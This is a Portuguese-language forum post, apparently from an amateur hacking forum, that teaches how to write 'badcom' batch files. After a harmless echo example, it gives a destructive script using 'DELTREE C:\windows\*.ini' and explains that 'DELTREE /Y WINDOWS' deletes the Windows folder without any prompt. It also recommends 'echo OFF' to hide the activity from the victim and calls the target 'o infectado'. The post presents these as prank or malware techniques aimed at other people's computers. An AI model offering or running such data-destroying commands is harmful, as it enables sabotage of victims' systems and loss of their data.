Sei lá, bem eu to afim de fazer alguma coisa util, e resolvi escrever uma materia de Badcom... não q isto seja util, mas é sempre util ter conhecimento sobre TUDO!!!
badcom é algum programa, pra ser mais preciso alguns comandos q vão ser executados em ms-dos mesmo!
Para fazer isto vc deve abrir um arquivo no bloco de notas, ou qualquer editor de texto de sua preferencia, vou usar o bloco de notas como exemplo.
Depois disso, vc deve escrever o codigo da badcom q vou especificar mais adiante, e depois de escrito deve, salvalo numa extensão .bat ou .com (dai vem o nome, dãããã).
Faz assim ó: Arquivo -> Salvar -> no salvar como seleciono: todos os arquvios -> coloque o nuome badcom.bat. Depois disso é só clicar 2 vezes nele pra executar.
Sim mas até agora não se faz nada com um badcom, dai vc deve pensar, mas eu tendo acesso a qualquer comando no dos, oq eu vou fazer???
Simples depende da tua intenção.
Vamos primeiro fazer uma badcom inofenciva:
Abra o bloco de notas -> digite: echo "Earth Worm Jim comanda os Badcom" -> save como espliquei antes -> clique duas vezes no arquivo, MEU DEUS vc acaba de fazer uma badcom... ![]()
Uma badcom destrutiva: abra o bloco de notas -> digite:
echo OFF
DELTREE C:\windows\*.ini
salve, E NÃO EXECUTE NO TEU PC!!!!
Isso vai excluir os arquivos de inicialização do sistema, em resumo, destroi o kra.
Pra não deixar fala deixa eu esplicar o "echo OFF" isto vai abrir o propt mas não vai aparecer nada escrito... bastante intereçante quando vc não quer q ninguem veja.
uma pequena lista de comandos uteis:
BOOT -> Escreva na ultima linha do Bad-com BOOT, E também deixe o arquivo com o nome de BOOT.
CHOICE -> vc pode dar opções pro infectado -> do estilo Y,N, vc tbm tera q usar um IF e ERRORLEVEL pra fazer as escolhas, exemplo pratico:
cls
echo Earth Worm Jim é um kra Legal
echo E ele salva o mundo das vacas assasinas, mas ensina a fazer Badcom's...
Echo Vc acha ele um Lammer????
echo ---------------------------------------------------
Echo [1] O Pior Lammer q eu ja vi!!!!!!
Echo [2] Se ele passar por aqui eu mato ele...
Echo [3] Vamos nos reunir pra tirar ele do Forum!!!
choice /c123
echo ---------------------------------------------------
if errorlevel 3 goto END
if errorlevel 2 goto END
if errorlevel 1 goto END
--------------------------------------------------------
salve e execute, é idiota, mas funciona caso vc tenha senço de humor...
DELTREE -> apaga arquivos, , mas isso vai perguntar se vc quer ou não apagar os arquivos, não se vc colocar DELTREE /Y WINDOWS , prontinhu...
GOTO -> volta pra um comando, exemplo:
:aqui
echo Earth Worm Jim é o bom!!!
GOTO aqui
este programa é legal... ![]()
Bem, acho q era isso, quem leu isto aqui e não conhecia badcom deve ter uma boa ideia agora... Quem ja conhecia poderia ter parado no inicio e se chegou até aqui espero q tenha aproveitado...
Se gostarem e os moderadores deixarem, vou fazer outras "materietas" sobre virus, pelo fato de me intereçar pelo assunto...
Pedido aos moderadores, caso excluam este topico, mande uma msg pra mim de consolação... ![]()
[]'s
There are currently 1 users browsing this thread. (0 members and 1 guests)